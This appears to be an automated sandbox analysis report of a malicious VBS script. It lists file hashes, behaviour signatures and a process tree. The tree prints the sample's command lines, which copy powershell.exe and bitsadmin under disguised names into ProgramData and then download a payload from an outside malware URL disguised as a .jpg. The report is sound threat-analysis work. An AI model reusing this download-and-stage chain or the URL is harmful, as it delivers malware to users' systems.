Analysis
-
max time kernel
117s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
21-02-2022 22:29
Static task
static1
Behavioral task
behavioral1
Sample
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
Resource
win7-en-20211208
General
-
Target
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
-
Size
9KB
-
MD5
f680c06c3ba90319e66f7e51879aa661
-
SHA1
97937ce0a605ac4ba37e25c090cc52b8d8c158ed
-
SHA256
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b
-
SHA512
86def545293b71e4171f76f19f80628833e270c8ef62f1bda0de5fa22bbe86396888f17de296da9d0f5198c1435263be907d342034a7ebd5ff9c45f205bc8473
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
CtTkBBiin.exepid process 1280 CtTkBBiin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 1684 wrote to memory of 2028 1684 WScript.exe cmd.exe PID 1684 wrote to memory of 2028 1684 WScript.exe cmd.exe PID 1684 wrote to memory of 2028 1684 WScript.exe cmd.exe PID 2028 wrote to memory of 464 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 464 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 464 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 1064 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 1064 2028 cmd.exe cmd.exe PID 2028 wrote to memory of 1064 2028 cmd.exe cmd.exe PID 1684 wrote to memory of 1280 1684 WScript.exe CtTkBBiin.exe PID 1684 wrote to memory of 1280 1684 WScript.exe CtTkBBiin.exe PID 1684 wrote to memory of 1280 1684 WScript.exe CtTkBBiin.exe PID 1684 wrote to memory of 1280 1684 WScript.exe CtTkBBiin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe3⤵PID:464
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe3⤵PID:1064
-
-
-
C:\ProgramData\CtTkBBiin.exe"C:\ProgramData\CtTkBBiin.exe" /transfer MbciAS /download https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg C:\Users\Admin\AppData\Roaming\it.jpg2⤵
- Executes dropped EXE
PID:1280
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51
-
MD5
0920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51